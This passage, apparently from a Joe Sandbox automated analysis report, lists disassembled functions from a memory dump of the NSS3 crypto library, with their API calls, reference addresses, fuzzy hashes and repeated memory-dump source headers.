Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 5081c89782011104af723133ff424a1171464cf48da1ec1879fe2f31a495e1c2
Instruction ID: 6e224e8509aa6277c546c872ad3d64f9da71be9618b9d57d52ea9e3bb4f7a712
Opcode Fuzzy Hash: 5081c89782011104af723133ff424a1171464cf48da1ec1879fe2f31a495e1c2
Instruction Fuzzy Hash: 44C19FB1A002199BEB20CF24CD85BDAB7B4BF58318F1441A8D94CA7741E779EE95CF90

Function 6C71DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C7297C1,?,00000000,00000000,?,?,?,00000000,?,6C707F4A,00000000), ref: 6C71DC68

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C707F4A,00000000,?,00000000,00000000), ref: 6C71DFAA

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: f4a6f88e6918490c4ea5f28f1d58a400919d7e464d65f0a8ec20726364e211b9
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: A581E67460E6008BFB134E18CA9435976AADB7034AF2C853AD559CAFD1E774C488CE4E

Function 6C6F3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C6F3C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C6F3C94

Part of subcall function 6C6E95B0: TlsGetValue.KERNEL32(00000000,?,6C7000D2,00000000), ref: 6C6E95D2
Part of subcall function 6C6E95B0: EnterCriticalSection.KERNEL32(?,?,?,6C7000D2,00000000), ref: 6C6E95E7
Part of subcall function 6C6E95B0: PR_Unlock.NSS3(?,?,?,?,6C7000D2,00000000), ref: 6C6E9605

PORT_NewArena_Util.NSS3(00000800), ref: 6C6F3CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C6F3CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C6F3CE1

Part of subcall function 6C6F3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C70AE42), ref: 6C6F30AA
Part of subcall function 6C6F3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6F30C7
Part of subcall function 6C6F3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6F30E5
Part of subcall function 6C6F3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6F3116
Part of subcall function 6C6F3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F312B
Part of subcall function 6C6F3090: PK11_DestroyObject.NSS3(?,?), ref: 6C6F3154
Part of subcall function 6C6F3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F317E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 95d65711163c18465767077c078538e5e2915b374b4662241c4355eba721310d
Instruction ID: 34f2bc17863a9b016f6321fb24db6efcc97d5b6f3e9ad15cf98e3c2b54790b7e
Opcode Fuzzy Hash: 95d65711163c18465767077c078538e5e2915b374b4662241c4355eba721310d
Instruction Fuzzy Hash: D1612871A00200ABEF105F65DD49FAB76BAEF04748F084039FE159A652F731D816C7B6

Function 6C733D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C733440: PK11_GetAllTokens.NSS3 ref: 6C733481
Part of subcall function 6C733440: PR_SetError.NSS3(00000000,00000000), ref: 6C7334A3
Part of subcall function 6C733440: TlsGetValue.KERNEL32 ref: 6C73352E
Part of subcall function 6C733440: EnterCriticalSection.KERNEL32(?), ref: 6C733542
Part of subcall function 6C733440: PR_Unlock.NSS3(?), ref: 6C73355B

TlsGetValue.KERNEL32 ref: 6C733D8B
EnterCriticalSection.KERNEL32(?), ref: 6C733D9F
PR_Unlock.NSS3(?), ref: 6C733DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C733DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C733E4F

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

TlsGetValue.KERNEL32 ref: 6C733E97
EnterCriticalSection.KERNEL32(?), ref: 6C733EAB
PR_Unlock.NSS3(?), ref: 6C733ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C733EEE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: a145d08fecdfe2cc95c4ab76a711643da705c6193fb5eb78df90bc340c151e13
Instruction ID: c0ac34252104e6630a1c055bd18b311eb22a72ed2f0a59846579707e5e4650d6
Opcode Fuzzy Hash: a145d08fecdfe2cc95c4ab76a711643da705c6193fb5eb78df90bc340c151e13
Instruction Fuzzy Hash: 7D5147B1A002209BEB216F69DE48A6673B8EF4531CF055539DE0C4BB53EB31E855C7D1

Function 6C6E2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(407E7CC6), ref: 6C6E2C5D

Part of subcall function 6C740D30: calloc.MOZGLUE ref: 6C740D50
Part of subcall function 6C740D30: TlsGetValue.KERNEL32 ref: 6C740D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C6E2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6E2CE0

Part of subcall function 6C6E2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6E2CDA,?,00000000), ref: 6C6E2E1E
Part of subcall function 6C6E2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C6E2E33
Part of subcall function 6C6E2E00: TlsGetValue.KERNEL32 ref: 6C6E2E4E
Part of subcall function 6C6E2E00: EnterCriticalSection.KERNEL32(?), ref: 6C6E2E5E
Part of subcall function 6C6E2E00: PL_HashTableLookup.NSS3(?), ref: 6C6E2E71
Part of subcall function 6C6E2E00: PL_HashTableRemove.NSS3(?), ref: 6C6E2E84
Part of subcall function 6C6E2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C6E2E96
Part of subcall function 6C6E2E00: PR_Unlock.NSS3 ref: 6C6E2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C6E2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C6E2D3F
free.MOZGLUE(00000000), ref: 6C6E2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C6E2DB8
free.MOZGLUE ref: 6C6E2DC8

Part of subcall function 6C6E3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E3EC2
Part of subcall function 6C6E3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6E3ED6
Part of subcall function 6C6E3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6E3EEE
Part of subcall function 6C6E3E60: PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6E3F02
Part of subcall function 6C6E3E60: PL_FreeArenaPool.NSS3 ref: 6C6E3F14
Part of subcall function 6C6E3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6E3F27

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 6bde9419882b441b2c8a08ae9bd5442fd865273175642a08befbe18b0d215ff3
Instruction ID: a3f0f8a4772bfbcf8ee560fc081657578d0825ff2d3461e38b8fa3b47cb54150
Opcode Fuzzy Hash: 6bde9419882b441b2c8a08ae9bd5442fd865273175642a08befbe18b0d215ff3
Instruction Fuzzy Hash: 3F512371A0A3169BDB10DF64CC89B5B77E6EF88308F14053EED4983650E731E815CB9A

Function 6C708F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C708FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C708FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C708FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C709013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C709042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C70905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C709073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7090EC

Part of subcall function 6C6D0F00: PR_GetPageSize.NSS3(6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F1B
Part of subcall function 6C6D0F00: PR_NewLogModule.NSS3(clock,6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C709111

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 43522957d9366672879d1b7d822e0f960c40c64618bdbce17d78b42ecb589596
Instruction ID: 1228070c0953dbd2d634ed40ca1a7037b52dad4ffbe2834b0c3fc68035ec8d83
Opcode Fuzzy Hash: 43522957d9366672879d1b7d822e0f960c40c64618bdbce17d78b42ecb589596
Instruction Fuzzy Hash: 88518BB0B042158FCB10EF78C688699BBF0BF49318F055679DC489B706EB34E885CB91

Function 6C6E7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6E40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6E3F7F,?,00000055,?,?,6C6E1666,?,?), ref: 6C6E40D9
Part of subcall function 6C6E40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C6E1666,?,?), ref: 6C6E40FC
Part of subcall function 6C6E40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C6E1666,?,?), ref: 6C6E4138

PR_GetCurrentThread.NSS3 ref: 6C6E7CFD

Part of subcall function 6C7A9BF0: TlsGetValue.KERNEL32(?,?,?,6C7F0A75), ref: 6C7A9C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C809030), ref: 6C6E7D1B

Part of subcall function 6C73FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C6E1A3E,00000048,00000054), ref: 6C73FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C809048), ref: 6C6E7D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C6E7D50
PR_GetCurrentThread.NSS3 ref: 6C6E7D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C6E7D7D
free.MOZGLUE(?), ref: 6C6E7D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C6E7DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C6E7E19

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 7ca27a70d2cb97b5ced6ac415c081986b5b30c25dd1b0b2bc4543a79f09d5659
Instruction ID: 374a67d09ce826401a660396da2383e53451333859a800f6a0d4307245b24c7e
Opcode Fuzzy Hash: 7ca27a70d2cb97b5ced6ac415c081986b5b30c25dd1b0b2bc4543a79f09d5659
Instruction Fuzzy Hash: 2C412772A0611A9BDB108F699C45BAF33E4AF4835CF150136EC09A7752E730ED15C7E5

Function 6C6F7EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C6F80DD), ref: 6C6F7F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C6F80DD), ref: 6C6F7F36
free.MOZGLUE(?,?,?,6C6F80DD), ref: 6C6F7F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C6F80DD), ref: 6C6F7F5D
DeleteCriticalSection.KERNEL32(?,6C6F80DD), ref: 6C6F7F94
free.MOZGLUE(?), ref: 6C6F7F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C6F80DD), ref: 6C6F7FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C6F80DD), ref: 6C6F7FE6
free.MOZGLUE(?,6C6F80DD), ref: 6C6F802D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 54583d827d2a0cf7c554b79592f6c59ed1890b7e20e14aee74cd3657bc8310bc
Instruction ID: fb73611af722853f33bad35598065603e4e4261831cf14bc68bdd303d4b02b02
Opcode Fuzzy Hash: 54583d827d2a0cf7c554b79592f6c59ed1890b7e20e14aee74cd3657bc8310bc
Instruction Fuzzy Hash: F4412AB1B05250CBEB30AFB9988DA4637B6AB4735CF008236E529C7741D734E416C7D9

Function 6C73FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C73FF00

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C73FF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C73FF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C73FF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C73FF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C73FF8C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: c9dc48d4f70389eb95c21c317ddb7029a35a25a150d0917d4d67397edf962a38
Instruction ID: d234848f327829c25ebdb3e34ce7944bdb123a923cf56e38d31c9b6fbaf166be
Opcode Fuzzy Hash: c9dc48d4f70389eb95c21c317ddb7029a35a25a150d0917d4d67397edf962a38
Instruction Fuzzy Hash: A33144B29013339BE7209E588E44B5B76A8AF62388F148179ED1C9BB42F731D914C7D2

Function 6C743CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C7438BD), ref: 6C743CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C7438BD), ref: 6C743CD1

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C7438BD), ref: 6C743CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C81B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C7438BD), ref: 6C743D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C7438BD), ref: 6C743D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C81B369,000000FF,00000000,00000000,00000000,6C7438BD), ref: 6C743D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C743D47
free.MOZGLUE(00000000), ref: 6C743D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C7438BD), ref: 6C743D6F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: 0a34873d2d502c89146590541e2beaca7e78bf2391ed3bd7d39587c320e6c5fa
Instruction ID: 6cc9d0114f7d9e294f93a9fd5b042a0750baa4766584453f862e44c7f2d4163a
Opcode Fuzzy Hash: 0a34873d2d502c89146590541e2beaca7e78bf2391ed3bd7d39587c320e6c5fa
Instruction Fuzzy Hash: C621C2B570552277FB3066BA4D0AE7B39ACDF826A9F140735B83DD7AC1DA60C800C6B1

Function 6C687D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C687E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C687E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C687EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C687F2E

Strings

database corruption, xrefs: 6C687EE2, 6C687F23
%s at line %d of [%.10s], xrefs: 6C687EE7, 6C687F28
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C687ED8, 6C687F08, 6C687F19

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 4737b82338c3c884b67caf1611e592c1d20b3a40e8dca41942f684a803880754
Instruction ID: f4e63c413b21b10d5b2ca019f94c9d437a4a1564654c4ff678638656354424b6
Opcode Fuzzy Hash: 4737b82338c3c884b67caf1611e592c1d20b3a40e8dca41942f684a803880754
